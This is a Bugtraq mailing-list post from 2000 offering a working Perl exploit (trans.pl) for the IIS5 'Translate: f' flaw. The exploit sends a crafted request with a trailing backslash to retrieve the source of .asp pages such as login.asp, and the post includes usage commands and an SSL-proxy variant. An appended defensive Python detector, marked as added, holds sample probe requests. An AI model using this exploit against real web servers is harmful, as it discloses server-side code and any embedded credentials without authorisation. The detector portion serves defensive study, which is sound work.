[16305] in bugtraq
Translate:f [another PERL exploit]
daemon@ATHENA.MIT.EDU (Roelof Temmingh)
Fri Aug 18 21:58:45 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.BSF.4.21.0008180932440.16471-100000@wips.sensepost.com>
Date:         Fri, 18 Aug 2000 09:41:48 +0200
Reply-To: Roelof Temmingh <roelof@SENSEPOST.COM>
From: Roelof Temmingh <roelof@SENSEPOST.COM>
X-To:         SMILER <smiler@VXD.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <007c01c00856$2bed8550$2d01a8c0@contentlab.net>

Below another PERL exploit:

Does not require LWP::UserAgent.
Will also work for virtually hosted sites.
Can easily be used against SSL sites (with the use of sslproxy)

Typical use:
perl trans.pl www.the_iis5_box.com login.asp 80

For use against SSL sites:
1) sslproxy -L 127.0.0.1 -l 7555 -R IP_of_iis5_box -r 443 -v Class3.pem
2) perl trans.pl 127.0.0.1 login.asp 7555

Use at own risk/etc etc.

Regards,
Roelof.

---cut: trans.pl---
#!/usr/bin/perl
use Socket;
#### test arguments
if ($#ARGV != 2) {die "usage: DNS_name/IP file_to_get port\n";}
##### load values
$host = $ARGV[0];
$toget = $ARGV[1];
$port = $ARGV[2];
$target = inet_aton($host);
##### build request (the blank line before EOT terminates the HTTP headers)
$xtosend=<<EOT
GET /$toget\\ HTTP/1.0
Host: $host
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f

EOT
;
$xtosend=~s/\n/\r\n/g;
####send request
#print $xtosend;
my @results=sendraw($xtosend);
print  @results;
#### Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;
                        print STDOUT "." if(defined $args{X});}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect...\n"); }
}
---cut----
------------------------------------------------------
Roelof W Temmingh		SensePost IT security
roelof@sensepost.com		+27 83 448 6996
		http://www.sensepost.com
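
Added example, not part of the original post: a Python check for defenders that inspects raw HTTP requests for the request shape trans.pl sends, a Translate: f header together with a request path ending in a backslash. The function names, the host www.example.test and the sample requests are constructed for illustration.

```python
from urllib.parse import unquote

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, target, headers)."""
    text = raw.decode("latin-1").replace("\r\n", "\n")
    lines = text.split("\n\n", 1)[0].split("\n")
    parts = lines[0].split()
    if len(parts) < 2:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # header names are case-insensitive
            headers[name.strip().lower()] = value.strip()
    return parts[0].upper(), parts[1], headers

def indicators(raw: bytes):
    """Return the set of Translate:f indicators present in one request."""
    _method, target, headers = parse_request(raw)
    path = unquote(target.split("?", 1)[0])  # decode %5c, drop query string
    found = set()
    if headers.get("translate", "").lower() == "f":
        found.add("translate-f")
    if path.endswith("\\"):
        found.add("trailing-backslash")
    return found

def is_probe(raw: bytes) -> bool:
    """True only when both indicators appear together, as in trans.pl."""
    try:
        return indicators(raw) == {"translate-f", "trailing-backslash"}
    except ValueError:
        return False

# Constructed sample requests (not captured traffic).
SAMPLES = {
    "trans.pl shape": b"GET /login.asp\\ HTTP/1.0\r\nHost: www.example.test\r\n"
                      b"User-Agent: SensePostData\r\nTranslate: f\r\n\r\n",
    "encoded variant": b"GET /login.asp%5C?x=1 HTTP/1.1\nhost: www.example.test\n"
                       b"translate:  F\n\n",
    "webdav client": b"GET /docs/report.doc HTTP/1.1\r\nHost: www.example.test\r\n"
                     b"Translate: f\r\n\r\n",
    "normal browser": b"GET /login.asp HTTP/1.1\r\nHost: www.example.test\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:16} probe={is_probe(raw)} {sorted(indicators(raw))}")
```

WebDAV clients also send Translate: f on ordinary requests, which is why the check requires the trailing backslash as well before it reports a match.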